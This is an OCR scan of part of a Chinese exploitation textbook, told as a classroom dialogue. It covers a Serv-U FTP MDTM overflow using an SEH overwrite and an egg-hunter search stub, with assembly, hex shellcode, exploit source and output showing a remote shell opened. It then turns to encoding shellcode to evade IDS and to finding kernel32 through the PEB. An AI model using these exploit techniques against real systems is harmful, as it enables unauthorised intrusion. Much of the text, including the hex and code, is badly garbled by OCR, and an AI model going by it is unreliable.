过 了 一 会 玉 波 说 道 : “哎哟 ，Serv_U 是 挂 掉 了 ， 但 端口 没有 开 起 来 。” 
“ПШ “2 这 是 怎么 回 事 呢 ? ”大 家 不 解 的 问 ，“ 就 是 按照 要 求 构 造 的 啊 ?” 
“ШШ! 那 是 因为 我 们 的 ShellCode 太 状 ， 被 截断 了 1 ” 


5.7.2 XP 下 SEH 的 利用 266 


5.7.3 跨 过 长 度 限制 一 一 搜索 


“这 个 漏洞 和 以 往 的 那些 漏洞 不 同 的 地 方 在 时 区 里 ， 有 长 度 的 限制 ， 超 过 了 294 字 节 融 会 航 截 
断 ， 当 然 完 不 成 我 们 想 要 的 功能 了 。 ” 老 羡 对 着 台 下 的 同学 们 说 。 


"I& ? 2944" $ ? Ж TIE?” 

“是 啊 ， 我 们 写 的 ShellCode 都 要 有 1000 字 节 ! ” 

“ 那 怎么 办 呢 ?" 大 家 想 啊 想 ,， “可 以 换 一 个 短 的， 但 294 个 字 节 也 太 短 了 。” 
“时 非 ? 放 入 我 们 的 搜索 代码 ?" 宇 强 说 。 


“对 ! 我 们 在 有 长 度 限制 的 时 区 中 放 入 我 们 短小 的 搜索 代码 ， 而 把 ShellCode 放 在 后 面 的 那个 
文件 名 中 上 


“我 们 获得 控制 权 后 束 先 执行 搜索 代码 ， 它 在 内 存 中 搜索 ww08 标 志 ， 搜 索 到 后 ， 才 跳 过 去 执行 
真正 的 ShellCode。 "大 家 明白 了 。 


“非常 正确 ， 其 利用 格式 如 图 5 一 29。” 





“而 第 一 部 分 时 区 放 入 我 们 的 搜索 ShellCode， 功 能 只 是 在 内 存 中 找 标志 ， 
行 。 其 构造 如 图 5 一 30。 ” 


Ви: 


找到 后 跳 过 去 执 





SEH 下 一 结 点 | 异常 处 理 点 
Мор nop ЕВО4 | 0x7FFA1571 


M mam m n mm ma m m" a ma я ma ma mA п аа аа и mE RR s аа ma m 





“第 二 部 分 文件 名 放 入 查找 标志 和 真正 的 ShellCode， 其 构造 如 图 5 一 31。” 


But2: 





"Aoi Р НА ix ЕВУ pas +U FH BE | 搜索 ww08 标 志 的 汇编 前 面 讲 过 ， 如 下 :” 


_ asm 
{ 
mov ebx, esp // 从 esp 开 始 搜 索 
mov eax, 0х77773037; //еах = ww07 
inc eax // 刚 才 是 ww97， 加 1 变 成 Ww98， 免 得 搜索 成 自己 
loop1: 
inc ebx 
стр [ebx],eax // 上 比较 是 否 为 ww08 
jne loop1 
inc ebx 
inc ebx 
inc ebx 
inc ebx 
call ерх // 找 到 ww08 标 志 ， 跳 过 去 执行 
} 


“在 VC 中 通信 汇编 ， 然 后 调试 提取 ， 得 到 搜索 代码 的 ShellCode。” 


char search[] = 
"NxX8BNxDCNxB8Nx37Nx30NX77NX77NX40NX43Nx39Nx03Nx75NxFBNx43Nx43Nx43' 
"\x43\xFF\xD3" 


“多 短 吧 1 我 们 把 原来 构造 程序 的 ShellCode 换 成 这 个 搜索 ShellCode 的 search。” 


“然后 在 真正 ShellCode 的 前 方 加 入 我 们 的 标志 'ww08’”， 放 在 空格 后 的 文件 名 第 二 部 分 ， 这 样 
就 完成 了 我 们 的 构造 ， 得 到 了 程序 ServUtest.cpp (光盘 有 收录 ) 。” 

"Mf 1 我 们 测试 一 下 吧 ! ”同学 们 急切 的 说 ,，“ 我 们 把 精心 构造 的 代码 发 送 过 去 ， 对 方 ServU 挂 
掉 ， 但 成 功 执 行 了 我 们 的 ShellCode， 打 开 了 端口 ， 如 图 5 一 32。” 


`. ServUtest = Hicrosoft Visual C++ = [Servltest. cppl 





| 加 File Edit View Insert Froieet Build Tools DriverStudio Window Help 
18 БЫ | m m |< c тры} G| `] n md sy 
|IGlobalsl ПАП global members || main “| + | e В Z * El ч 


A] 到 memset(buFF, В, sizeof(buFf)); 
не яны, recu(s, buff, sizeof(buFF), 8); 
EA Servltest cl: printF(buFf): 








if(buFF[BH] == '5") 


closesocketí(5s); 
printF('"Ruthentication failedf**rn"); 
return; 

Н 


char xploit[15880] = 40}; 
char head[] = “MOTH 198111021728 00+1п My Dream I Always See You Soar Above The Sku''; 


QfOSWWHWWGOXXWXEWHWNEXEXKXXKEWHHHNUIXGXEXKKHHHIZXXEXNNNNHWXEXXXXEWHNWEEXKWHHHHEXENNHHHNXEXXNXNNMN 
查找 wwes 这 个 标志 ， 然 后 跳 过 去 执行 
YY33E3MMNEMESRERESESESOERERESESESES3MOMENEERESSESE3ERERESESSESEERREMEREERSESOOMESRESESRES3SMMEMESESEREESESEMME3ME3E3ME3E3E3E3E [7 
char search[] = 
UAXBBXAXDCSXBBXAXS7XXIBXXTZXXZ KAON IAAI SAFE AI AT NQ 
"AKAJA NFF Da"; 


zs Telnet 211.83.154. 120 


nenset(xploit, 9, sizeof (xp1o1t)) ; Hicrosoft Windows ЯР СЕ 5.1.26HBH ] 
strcpy(xploit, Apu « EEEE 
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| PIS Seru-U ЕТЕ Server u4.B for WinSack ready... 

| 231 User name okay, please send complete E-mail address as 
3230 User logged in, proceed. 

success! Lry connect port 9111 ta get your she 11... 





— П ТИ Т Ч Те ТТ 





"telnet 对 方 的 8111 闯 口 ， 成 功 的 登陆 上 了 对 方 1 "ГЕ 2: B9 5638. 


“好 ， 到 这 里 ， 我 们 稍微 总 结 一 下 ， 温 故而 知 新 呆 1 "老病 说 道 , “一 般 的 ShellCode 都 由 两 部 分 
构成 ， 前 面 一 titi 后 面 一 段 是 编码 后 的 ShellCode。” 


“第 一 段 的 存在 是 因为 第 二 段 如 果 不 经 过 编码 ， 可 能 含有 大 量 的 0x00， 从 而 导致 在 字符 串 处 理 
时 被 截断 。 而 编码 的 方法 束 是 我 们 今天 看 重 介绍 的 内 容 。” 


“还 有 些 时 人 息 ， 浴 出 会 对 长 度 有 限制 ， 这 时 要 么 找 一 个 较 短 的 ShellCode 完 成 功能 ， 要 么 避 开 
长 度 的 限制 ， 做 一 个 简单 的 搜索 代码 ， 而 把 真正 的 ShellCode 放 到 其 他 地 方 ， 融 像 刚 才 的 
MDTM;m — 4. ” 


大 家 在 台 下 认真 的 记 着 笔记 。 





“呵呵 上 Hf, "老病 说 道 , “下 午 有 微软 研究 院 的 学 术 活 动 
E! 大 家 早点 吃饭 ， 去 见 见 高 手 吧 1” 


计算 与 你 同行 ， 现 在 就 下 课 


5.8 “计算 与 你 同行 "一 一 Computing & Society 


宇 强 日 记 之 四 : 
11 月 11 日 B 


今天 有 到 参加 了 微软 亚洲 研究 院 举 办 的 “计算 与 你 同行 "大 型 学 术 人 研讨 会 。 见 识 了 一 个 个 高 手 ， 
充分 认识 到 了 自己 的 差距 。 


吃 过 午饭 ， 我 和 古风 、 玉 波 、 小 倩 一 行 去 乘 车 地 点 一 一 体育 馆 。 因 为 会 场 在 电子 科大 ， 主 办 
方 为 了 方便 各 校 的 参与 ， 派 出 了 专车 进行 接送 。 好 多 人 啊 ! 虽然 有 几 十 辆 大 BUS， 但 我 们 登 
上 车 时 ， 已 经 没有 位 置 了 ， 看 来 微软 的 吸引 力 就 是 大 啊 1 


不 一 会 儿 ， 车 队 就 出 发 了 。 奇 怪 的 是 ， 本 来 可 从 一 环 路 直接 到 目的 地 ， 结 果 先 从 西门 出 发 ， 
绕 到 未 门 ， 又 绕 回 西门 ， 然 后 走 二 环 路 ! 当 终 于 进入 科大 校门 时 ， 我 们 都 非常 疲惫 了 ， 特 别 
是 小 傅 ， 脸 都 青 了 ， 好 心痛 啊 ...... 


不 过 天 气 还 算 清 并 ， 微 风 习 习 ， 周 全 的 组 织 和 热情 的 欢迎 将 我 们 的 众 总 一 打 而 光 ， 转 而 是 热 
切 的 期 符 。 


开幕 式 过 后 ， 邻 人 振奋 的 演讲 开始 。 首 先是 Rick Rashid 和 Chuck Thacker 的 “ 插 上 计算 的 怒 
膀 " 和 "21 世纪 的 计算 机 ”。 虽 然 他 们 讲 得 很 慢 ， 但 还 是 只 能 借助 同 声 翻译 器 才能 完全 明白 意 
义 ， 我 深 深 感到 :“ 要 想 取 得 成 绩 ， 史 语 一 定 要 打 好 基础 ! 这 样 二 能 无 障碍 的 阅读 世界 上 最 先 
进 的 科技 文献 ， 和 与 世界 科技 的 发 展 作 无 颖 连接 1! ” 


接 下 来 是 亚洲 微软 研究 院 的 院 长 和 前 院 长 的 演讲 。 

现任 院 长 沈 同 洋 ，13 岁 融 进 入 大 学 ，30 岁 成 为 亚洲 微软 研究 院 的 院 长 ! 

而 前 院 长 张亚勤 ，12 岁 束 读 大 学 ，38 岁 成 为 IEEE 百 年 历史 以 来 最 年 轻 的 院士 ! 
目 古 英雄 出 少年 1 

"ч Ет EN, ARMET BABSEBEX,. 


而 我 在 想 : Важи AHER, RAMENEM FARRER, M38 — RREA 
年 龄 时 ， 会 有 什么 成 绩 ? 又 会 是 一 个 什么 样 的 人 呢 ? 


但 我 不 会 以 他 们 为 目标 来 奋斗 ， 如 有 果 那 样 ， 那 最 多 能 到 达 他 们 的 水 平 融 不 错 ， 而 且 多 半 不 能 
达到 。 


我 要 不 断 与 目 己 竞 争 ， 努 力 超越 目 我 ， 这 样 才能 在 目 身 水 平 上 取得 不 断 进 步 ! 
回来 的 路 上 ， 我 不 茜 感 概 万 干 ! 小 学 6 年 真 的 瀛 费 了 不 少时 间 啊 1 КАЛ  Е1ЕША4% Т, 
HABE : “是 啊 ， 不 过 我 觉得 初中 更 瀛 费时 间 。” 


玉 波 也 说 : “le | 就 是 啊 ， 我 觉得 小 学 、 中 学 、 大 学 都 是 浪费 时 间 啊 ， 如 果 我 8 岁 就 下 海 ， 去 倒 
卖 馒 头 ， 现 在 都 是 亿 万 富 伍 了 。” 


大 家 都 笑 了 起 来 。 


也 许 天 赋 是 与 生 俱 来 的 ， 机 遇 更 是 不 能 强求 。 但 我 应 该 潜心 打 好 基础 ， 随 时 做 好 准备 ， 才 能 
在 机 会 到 来 之 时 ， 拥 有 把 握 住 机 会 的 实力 ! 


车 不 需要 知道 自己 未 来 的 路 通 到 哪里 去 ， 驾 驶 员 知 道 。 但 世界 上 会 有 人 知道 自己 人 生 的 路 会 
通 向 哪里 吗 ? 


所 以 我 能 做 的 ， 融 是 把 握 住 每 一 个 机 会 ! 


Ж 6 BE = 


Q : ShellCode 中 的 0x00 为 什么 要 去 掉 ? 


А: 论坛 上 见 过 多 次 的 经 典 问题 ， 已 经 作 了 详细 讲解 。 这 里 再 说 一 通 ， 在 C 语 襄 中 ， 字 符 串 是 
以 0x00 为 结束 标志 ， 所 以 如 果 目 标 程序 是 以 strcpy 等 函数 来 作 字 符 串 拷贝 导致 浴 出 的 ， 则 到 达 
ShellCode 中 的 0x00 时 ， 融 会 认为 是 字符 串 结 束 ， 从 而 停止 拷贝 ， 导 致 ShellCode 被 截断 ， 完 
不 成 想 要 的 功能 。 


О: 为 什么 有 “0x000x98” 这 样 的 ShellCode 和 存在 呢 ? 
A : 那 是 Unicode，Unicode 是 两 个 字 节 表示 一 个 字符 。 
О: 文本 中 的 0 和 16 进 制 中 的 0x00 有 什么 区 别 呢 ? 


A: 当然 不 一 样 了 ，0x00 就 是 16 进 制 的 0x00 ; 而 文本 中 的 0 对 应 的 16 进 制 是 0x30。 有 个 方法 
可 以 帮助 大 家 理解 ，0x00 是 不 可 见 的 字符 ， 在 文本 文件 里 是 看 不 可 见 的 ; 而 文本 中 的 0， 当 然 
是 可 见 的 ， 所 以 自然 和 不 可 见 的 0x00 有 区 别 了 


Q : 怎么 去 掉 ShellCode 中 的 0x00 呢 ? 


A: 我 已 经 详细 讲解 过 了 。 疼 体 思路 融 用 编码 方法 ， 将 原 ShellCode 变 成 enShellCode ; 然后 
ma n bs) 如 果 还 有 特殊 字符 ， 束 需要 再 进行 微调 。 


О: 发 现 直 接 蔡 换 法 是 把 小 于 0x1F 的 字符 都 作 了 轮换 处 理 ; 但 decode 本 身 还 有 小 于 0x1F 的 字 
符 呢 ? 


А: 这 是 故意 留 给 大 家 的 一 个 小 问题 ! 分 析 一 下 decode 代 码 里 会 出 现 小 于 0x1F 字 符 的 原因 
IE, 然后 想 办 法 避 开 它 已 们 (提示 : 微调 法 ) ° 


Q : 除了 课 上 讲 的 几 种 编码 变换 方法 ， 还 有 其 他 的 方法 吗 ? 


A: 当然 有 了 。 比 如 ， 我 们 还 可 异 或 几 个 字 节 的 Key， 比 如 取 Key 为 0x123456， 这 样 来 避免 单 
字 节 Key 的 不 足 ; 也 可 动态 使 用 随机 的 Key， 以 进一步 躲避 IDS。 编码 的 算法 你 还 可 以 进一步 
研究 ， 想 ?2 姜 | | 5 出 新 的 算法 。 

О 怎样 才 和 有 能 构思 出 编码 的 新 算法 呢 ? 

А: 一 、 基 础 要 好 ; 二 、 要 有 发 散 性 的 思维 ! 

Q: 怎样 牢固 知识 基础 ， 提 高 编程 能 力 呢 ? 

А: 如 果 是 大 学 生 ， 多 参加 ACM / 1ICPC 吧 ! 然后 经 过 努力 ， 通 过 选拔 ， 进 入 ACM /1CPC 的 学 
校 集训 队 。 和 优秀 的 人 在 一 起 才能 更 优秀 。 


Q : XP4IWin20001HEE, IRT ЗЕНЕЈА 7], it BEES Hes Er d ЕҤ SE АЈ 
ARE? 


A: 一 些 特殊 的 程序 ，Win2000 下 可 直接 把 地 址 覆盖 成 ShellCode 的 地 址 ， 从 而 直接 跳 转 过 去 
利用 ; 而 XP 不 允许 执行 栈 中 的 代码 。 所 以 利用 时 ， 要 履 盖 写 入 另 一 个 跳 转 地 址 ， 再 返回 栈 
中 。 课 彰 上 对 堆栈 浴 出 利用 的 所 有 讲解 ， 都 是 使 用 的 这 种 方法 ， 所 以 对 Win2000 和 XP 都 适 
用 。 


О: 使 用 搜索 法 时 ， 如 果 搜 索 的 标志 恰好 在 内 存 中 有 重复 的 值 ， 会 导致 搜索 失败 吗 ? 


А: 如 果 内 存 中 正好 有 重复 的 标志 值 ， 当 然 有 可 能 失败 。 如 果 那 个 标志 很 简单 ， 上 比如 用 一 个 
0x90909090， 融 很 有 可 能 找到 其 他 地 方 去 ; 但 如 果 用 一 个 奇怪 的 数据 (如 你 的 名 字 ) ， 那 多 
半 没 有 重复 ， 可 以 正确 的 定位 。 

Q : 还 有 其 他 需要 编码 的 程序 可 以 实际 利用 吗 ? 


А : 很 多 啊 ! Serv_U 漏 洞 、Cmail 漏 洞 、Cproxy 漏 洞 等 ， 自 己 根据 漏洞 公告 ， 用 已 学 的 知识 实 
际 利 用 一 下 吧 | 


第 六 章 ShellCode 编 写 高 级 技术 


天 气 渐渐 变 闪 了， 而 今天 ， 是 特别 的 渝 。 老 病 走 进 教 宇 ， 踩 踩 脚 说 :“ 好 冷 啊 1” 


" 台 下 的 同学 呼出 的 气 都 是 白 雾 ， 很 多 人 都 带 上 了 手套 。 
“大 家 下 去 有 没有 测试 前 面 学 习 的 内 容 啊 ?” 
ЖН, ТА 22 


“是 啊 ! 冬天 来 了 。 
大 家 注意 身体 啊 ! " 老 羡 打开 了 教学 设备 

“当然 有 啊 ! es “在 微软 精 类 们 的 打击 下， 我们 都 倍 感 舌 距 。 

ze 1 

“呵呵 | SEERA ARERR, AORTA 

“有 啊 ! 我 发 现 外 面 的 ShellCcode 据 称 都 是 版 本 通用 的 ， 我 测试 了 一 下 ， 也 的 确 能 


怎么 实现 的 呢 ? "古风 说 。 


SUE? 


o €x 


ix je ЯЙ S] A. "034728, 
玉 波 摸 摸 肚子 ， 说 到 : "我 觉得 提取 ShellCcode 时 ， 通 过 抄 机 器 码 太 累 了 ， 而 且 觉 得 实在 没 必 


要 做 如 此 机 械 的 工作 。 


"sg 【是 啊 ! "大 家 都 表示 赞同 。 
么 发 现 的 呢 ! 希望 自己 能 掌握 、 


怎么 


"Hx 1 " 宇 强 忽然 想起 来 了 ， 说 道 :“ 我 还 想 知 道 那些 漏洞 是 看 
发 现 位 置 漏洞 的 方法 ， 并 能 利用 漏洞 ! “ 


老病 说 : “发现 未 知 的 漏洞 .…... 这 个 难度 很 大 啊 1” 


“ЕЕ | 不 会 吧 ?” 大 家 都 一 脸 的 不 悦 。 


"呵呵 | 但 也 有 一 些 技术 和 方法 了 ， 大 家 还 是 可 以 讨论 一 下 。 好 1 我 明日 大 家 想 知道 什么 了 。 


首先 ， 我 们 来 看 看 ShellCode 编 写 和 提取 的 高 级 技巧 吧 1 ” 


6.1 通用 ShellCode 的 编写 


“现在 外 面 使 用 的 ShellCode， 都 是 各 版 本 通用 的 ，” 老 评介 绍 道 , “这 是 通用 攻击 程序 编写 的 必 
要 基础 。 可 以 说 ， 通 用 的 ShellCode 十 通用 的 跳 转 地 址 = 通用 的 Exploit。” 

“通用 的 跳 转 地 址 我 们 已 经 有 了 ， 那 通用 的 ShellCode 时 怎么 来 的 呢 ?” 大 家 迫不及待 的 说 ，“ 我 
们 好 想 知 道 啊 1” 

“大 家 有 动力 就 好 ， 我 们 一 起 来 看 看 ShellCode 通 用 性 的 解决 过 程 吧 ! 在 这 个 过 程 中 ， 大 家 可 
切实 体会 到 : 技术 是 一 代 接 一 代 推 动 发 展 的 1” 





6.1.1 思路 动态 定位 函数 的 地 址 


“ShellCcode 的 执行 过 程 融 是 调用 国 数 的 过 程 。” 老 评说 道 ， 


"Windows F 33 Э 947 7; zb, — 
是 参数 入 栈 ; 二 是 CALL 函数 地 址 。” 


“ 那 大 家 想 想 ， 我 们 前 面 写 的 ShellCode， 各 系统 版 本 间 不 能 混用 ， 其 原因 是 出 在 哪里 呢 ? 


“原因 ..………. 原 因 出 于 版 本 不 同 ! " 玉 波 回答 道 。 


«27 740 


‘жаят ЛЛ], А НЕНТ ЈЕ ? ”老病 提醒 大 家 。 


“参数 入 栈 部 分 看 起 来 是 一 样 的 ; 拿 应 该 时 各 个 版 本 下 画 数 的 地 址 不 同 吧 ! " 宇 强 分 析 道 。 


| 系统 不 同 ， 同 一 个 范 数 的 地 址 融 不 同 。 比 如 Windows 2000 和 XP， 或 者 中 文 版 XP 和 英文 


ie LoadLibrary 函 数 的 地 址 都 不 同 ; 而 且 ， 同 禅 的 系统 、 同 样 的 语言 版 本 ，SP 补 丁 不 
函数 的 地 址 也 不 同 。” 


“ 哦 ，ShellCode 的 通用 性 束 是 要 解决 函数 地 址 的 通用 性 吧 1 ” 
“非常 正确 1” 


“难道 每 个 男 数 都 存在 各 版 本 通用 的 隐藏 地 址 ?我 们 直接 调用 隐藏 地 址 就 行 了 ?” 玉 波 想起 当年 
打 C&C 的 隐藏 关卡 。 


这 个 我 不 知道 ， 可 能 要 问 问 比尔 . 盖 菊 才 知 道 哦 1 ”老病 笑 着 说 ， L. FRo BRT IR 
尔 存 在 象 ttEnterCriticalSection 国 数 指针 外 ， 其 他 函 数 的 地 址 都 绝对 不 同 ! ' 


“ 那 怎 么 完成 通用 的 呢 ?真是 'Mission Impossible' 啊 | "大 家 苦 苦 思索 。 


ZK rh EH ÜN 
“我 提示 一 下 ， 在 ShellCode 的 编 守 中 ， 我 们 便 用 过 GetProcAddress 来 获得 其 他 函数 的 地 
ШЕ гд. ў 
“对 啊 1 老病 真 


是 汤姆 . 克 和 鲁 斯 啊 1" 大 家 上 顿 觉 山 穷 水 尽 疑 无 路 ， 柳 上 暗 花 明 又 一 村 ,， “我 们 不 使 用 
固定 的 函数 地 址 ， 而 是 在 ShellCode 中 先 用 GetProcAddress 获 得 男 数 的 地 址 一 一 获得 当时 所 
在 系统 上 的 地 址 ， 然 后 在 调用 它 ! 


“呵呵 ? 别人 都 说 我 是 三 重 刘 德 华 呢 1 ”老病 开玩笑 的 说 ，“ 很 好 | 但 除了 GetProcAddress 外 ， 
还 需要 知道 LoadLibrary 的 地 址 ; 然后 我 们 融 可 利用 这 两 个 函数 来 动态 获得 其 他 函数 的 地 址 ， 
并 存 起 来 。 | 以 后 ， 要 调用 画 数 时 ， 就 使 用 保存 起 来 的 地 址 ， 从 而 完成 具有 通用 性 的 

ShellCode ! ” 


“R, BAT! 思路 应 该 时 这 样 。 我 们 动态 定位 函数 的 地 址 再 调用 。"? 学 生 们 


男 出 了 图 6 一 1 的 示 


3k 18 socket PK y AI Hh HE 


E US ЕН 
A 4th, БАЗ BJ Hi HE 





эк БАГА, SB). 
“但 如 何 获得 GetProcAddress 和 LoadLibrary 的 地 址 呢 ? "老病 又 问 道 。 
大 家 又 慢 住 了 ,， “EW, BARE ? 好 像 这 两 个 函 效 的 地 址 并 没有 宇宙 通用 版 啊 ! 7 


“大 家 能 想到 这 里 ， 很 不 错 1 这 也 是 早期 ShellCode 卡 住 的 地 方 。” 老 炳 说 道 ，“ 当 人 们 对 宇 
对 地 球 、 对 Windows 系 统 不 断 的 深入 认识 后 ， 终于 有 了 解决 的 方法 。” 


' 哦 ?这 人 么 厉害 ， 什 么 方法 ?” 


“ 融 是 利用 Windows 的 系统 结构 来 获得 GetProcAddress 和 LoadLibrary 本 数 的 地 址 。 


6.1.2 方法 一 、 野 变 的 暴力 搜索 
“在 国内 ， 首 先 想 出 方法 的 是 guange。 "老病 说 道 。 
"EE ! 又 是 他 啊 | "大 家 想起 在 编码 时 讲 过 他 的 方法 。 


“他 在 很 早 以 前 ， 融 对 Windows 的 系统 扩 术 炉火纯青 。 不 仅 编码 ， 动 态 定位 ， 而 且 在 
ShellCodem2tJJB&. AAt RAAME fS BJ, ÍB...... 鲜 有 详细 的 文档 记录 。 现 在 他 也 
把 很 多 东西 都 忘 了 吧 ! 我 们 只 能 通过 他 的 程序 临 莫 一 招 半 式 了 。” 


“ 哦 | ” 
所以， 我 给 你 们 上 的 课 ， 都 是 在 做 扫地 的 工作 ， 也 就 是 扫地 僧 ' ! ° 
“BE | 做 ' 扫 地 僧 ' 好 啊 ， 是 金庸 大 侠 手 下 武功 最 高 的 人 物 了 ! "小 倩 一 副 很 羡慕 的 祥子 。 


* 汗 一 是 啊 ! 为 了 让 像 大 家 一 样 的 初学 者 引起 兴趣 ， 尽 快 入 门 1 我 会 担当 起 ' 扫 地 僧 ' 责 任 
的 。 ”老病 说 道 。 


“多 谢 老 证 1 我 们 也 会 努力 学 习 的 ， 不 会 囊 负 老病 的 期 望 。" 教 室 里 大 家 都 纷纷 表 太 。 


“ 别 谢 我 什么 ， 要 谢 就 谢 《Q 有 版 黑客 》 系 列 图 书 吧 | 谢谢 他 们 全 力 的 支持 ， 才 使 这 门 课 得 以 顺 
利 开 展 。 


"好 了 ， 我 们 来 看 看 yuange 提 出 的 方法 。” 老 炳 又 回 到 了 正题 。 


“yuange 提 出 的 思路 就 是 : SHELLCODE 只 依靠 GetProcAddress 和 LoadLibraryA 这 两 个 函 
数 ; 而 LoadLibraryA 是 在 系统 库 KERNEL32.DLL 里 面 的 ， 也 可 以 使 用 GetProcAddress 得 到 |， 
所 以 我 们 只 需 知 道 GetProcAddress 的 地 址 就 可 以 了 。 


“R 1 ЕЩ 1 但 GetProcAddress 的 地 址 又 怎么 获得 呢 ? 这 是 关键 啊 " 大 家 着 急 的 说 。 


“呵呵 ，yuange 说 了 (怎么 像 黑 社会 的 ......) ，kernel32.dll 一 般 都 会 被 加 载 ， 所 以 解决 办 法 就 
是 在 内 存 里 查找 kernel32.dll 这 个 系统 库 和 GetprocAddress 函 数 的 地 址 。” 


EL LR 
“俗称 就 是 暴力 搜索 1" 


“ 啊 ! 暴力 搜索 ! 好 恐怖 啊 1 "大 家 紧张 的 的 说 。 


“其 实 ， 只 要 了 解 了 Windows 的 系统 结构 就 不 难 。 吉 哥 的 程序 ， 是 从 0x77e0000 或 0xbff00000 
开始 搜索 ， 搜 索 到 MZ 和 PE 标志 时 ， 就 表示 是 kernel32.dll 的 开始 地 方 。” 


小 知识 : PE 结构 


PE 的 意思 融 是 Portable Executable (可 移植 的 执行 体 ) 。 它 是 Win32 环 境 上 自身 所 带 的 执行 体 
文件 格式 。 所 有 Win32 执 行 体 都 使 用 PE 文件 格式 ， 包 括 NT 的 内 核 模式 驱动 程序 。 


PE 文件 结构 以 一 个 IMAGE _DOS_HEADER 结 构 开 始 ， 所 以 开头 是 一 个 简单 的 DOS MZ 
header， 紧 随 MZ header 之 后 的 是 DOS stub。 紧 接着 DOS stub 的 是 PE header， 所 以 可 以 根 
据 MZ 和 PE 标志 来 判断 一 个 程序 是 否 是 可 执行 程序 ， 其 详细 结构 如 下 : 


typedef struct _IMAGE DOS HEADER {?? 

WORD e magic; ;DOS 可 执行 文件 标记 “MZ” 

WORD e_cblp; 

WORD e_cp; 

WORD e_crlc; 

WORD е_срагһаг; 

WORD e_minalloc; 

WORD e_maxalloc; 

WORD e_ss; 

WORD e_sp; 

WORD e csum; 

WORD e ip; 

WORD e cs; 

WORD e lfarlc; 

WORD e ovno; 

WORD e res[4]; 

WORD e oemid; 

WORD e oemnintfo: 

WORD e res2[10]; 

LONG e lfanew; ;指向 PE 文件 头 "PE",0,0 
y IMAGE DOS HEADER, *PIMAGE DOS HEADER; 


“找到 kernel32 后 ， 再 搜索 函数 的 引出 表 ， 找 到 LoadLibrary 的 函数 名 和 LoadLibrary 函 数 对 应 的 
地 址 就 完成 了 搜索 。， 


“我 把 yange 的 程序 加 上 了 一 些 注 释 ， 大 家 下 来 可 参考 SearchByYuange.cpp (光盘 有 收录) ， 
文 里 融 不 作 详 细 解 释 了 。 "老病 说 道 。 

“ 啊 ? 为 什么 不 解释 呢 ? 还 不 大 懂 呢 ! n 

“呵呵 ， 第 一 是 因为 代码 复杂 难 懂 ， 我 这 个 ' 打 地 僧 ' 要 解释 清楚 也 很 困难 ; 第 二 是 从 
0x77e00000 或 0xbff00000 开 始 搜索 ， 已 经 不 完全 通用 了 ; 第 三 是 技术 不 断 进步 ， 后 来 有 了 更 


为 优雅 、 更 为 完美 的 方法 。 而 且 后 面 讲 的 方法 和 yuange 的 方法 大 部 分 是 一 样 的 ， 我 们 学 习 之 
А, А82 7 


6.1.3 方法 二 、PEB 获 取 GetProcAddrees 辑 数 地 址 


“我 们 还 是 来 ' 独 览 大 略 ' 吧 ! "老病 说 站 ,“ 斗 转 星 移 ， 随 看 时 间 的 发 展 ， 有 了 更 简单 、 优 雅 的 搜 
索 方 法 。” 


“ 哦 ， 是 谁 最 先 提出 来 的 呢 ? ” 


“这 个 .……. 我 也 不 知道 ， 佑 计 最 早 提 出 来 的 时 候 ， 我 连 电脑 都 不 知 为 何 物 呢 ! 呵呵 1 "TES 

说 ，“ 我 看 国内 倒是 jneo 和 scz 都 有 过 详细 的 分 析 。 这 种 方法 还 是 分 为 两 部 分 ， 第 一 部 分 是 获得 
kerner32.dll 的 基 址 ; 第 二 部 分 是 动态 获得 范 数 的 地 址 。” 

“ 哦 ! yange 获 得 kerner32.dll 基 址 的 方法 是 暴力 搜索 吧 ? ”古风 问 道 。 

“对 ! 而 jneo 和 scz 则 使 用 了 改进 的 方法 ， 利 用 PEB 结 构 来 获得 kerner32.dll 的 基 址 。” 

“PEB， 进 程 环境 块 ?好像 以 前 介绍 过 。” 大 家 隐约 有 点 印象 。 


“是 啊 ， 在 堆 浴 出 利用 时 ， 我 们 介绍 过 覆盖 PEB 里 面 的 RtlEnterCriticalSection 男 数 指 针 ， 大 家 
可 翻 翻 以 前 的 笔记 。 而 这 里 ， 利 用 PEB 获 得 kernel32.dll 的 原理 如 下 : ” 


老师 在 黑板 上 写 了 下 来 。 

1.fs 寄 存 器 指向 TEB 结 构 

2. 在 TEB+0x30 地 方 指 向 PEB 结 构 

3. 在 PEB+0x0C 地 方 指 向 PEB_LDR_DATA 结 构 


4. 在 PEB_LDR_DATA+0x1C 地 方 就 是 一 些 动 态 连 援 库 地 址 了 ， 如 弟 一 个 指向 ntdll.dll， 第 二 个 
就 是 kernel32.dll 的 地 址 。 


“其 结构 示意 图 如 图 6 一 2。” 





PEB РЕВ LDR DATA 动态 链接 库 好 址 


| kernel32 的 地 址 
十 30h | 




















“老病 ， 为 什么 给 出 的 偏 移 量 正好 指向 想 要 的 结构 呢 ?” 玉 波 问 道 。 


“因为 ...... 比尔 . 盖 沈 当初 束 是 这 么 设计 来 着 。” 

“ 那 比尔 . 盖 欢 为 什么 要 这 样 设 计 呢 ?3 ERX 5], 

“ 那 可 能 是 由 他 生活 的 环境 和 个 人 性 格 造 融 的 吧 ! ” 

“ 哦 ?是 什么 环境 和 性 格 造 融 了 他 这 人 么 设计 呢 ? " 玉 波 要 打破 沙锅 问 到 医 了 。 

“A | 那 是 美国 的 诞生 和 文化 造 融 了 那样 的 环境 和 性 格 呀 ! 好 了 ， 要 完全 解决 这 个 问题 ， 我 们 
融 只 有 使 用 回溯 法 ， 回 溯 到 亿 万 年 前 ， 玫 宙 大 爆炸 的 时 候 ， 可 能 某 个 尘埃 的 偏 移 加 速度 的 
值 ， 导 致 了 今天 有 这 人 么 一 位 比尔 . 盖 次 ; 可 能 那个 尘埃 的 某 次 磁 撞 变 向 ， 导 致 了 上 比尔 . 盖 沈 采用 
这 样 的 结构 设计 。” 

A aces "大 家 无 语 了 。 

“了 呵呵， 人 类 一 思考 ， 上 芝 就 发笑。 有 很 多 事情 ， 我 们 是 无 法 探 其 根源 的 ， 只 能 接受 1 Д] 
我 们 不 知道 ， 也 不 用 去 知道 ， 在 大 爆炸 前 的 宇宙 是 什么 样 的 一 样 ， 我 们 只 能 认为 时 间 是 从 那 
一 刻 示 开始 的 。” 

“我 们 还 是 看 看 更 关心 的 东西 吧 ! 利用 PEB 坦 找 kernerl32 地 址 的 汇编 实现 吧 | 以 下 是 汇编 实 


N, з 7 
mov eax, fs:0x30 ;PEB 的 地 址 
mov eax, [eax + 0x0c] ;Ldr 的 地 址 


mov esi, [eax + Oxic] ;Flink 地 址 


lodsd 
mov eax, [eax + 0x08] ;eax 就 是 kerne132.d11 的 地 址 


“很 优雅 吧 ? 了 呵呵 ! "老病 问 道 。 

